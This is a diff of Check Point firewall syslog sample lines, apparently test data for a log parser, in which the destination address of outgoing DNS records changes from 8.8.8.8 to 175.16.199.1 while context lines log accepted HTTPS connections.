-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49194"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43196"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"45748"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"54800"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49331"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"195.88.54.41"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52622"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x7,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"52.49.248.24"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"38658"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48187"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51764"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36823"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x8,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"48187"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x9,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51764"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xa,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46662"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xb,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38829"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xc,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36823"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xd,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"14"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.26.6.155"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"58776"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xe,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"15"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"99.86.116.53"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60950"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0xf,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"16"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x10,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"17"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51711"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x11,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"18"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43223"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:42:08Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80ddf0,0x12,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"19"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585503728"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40944"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
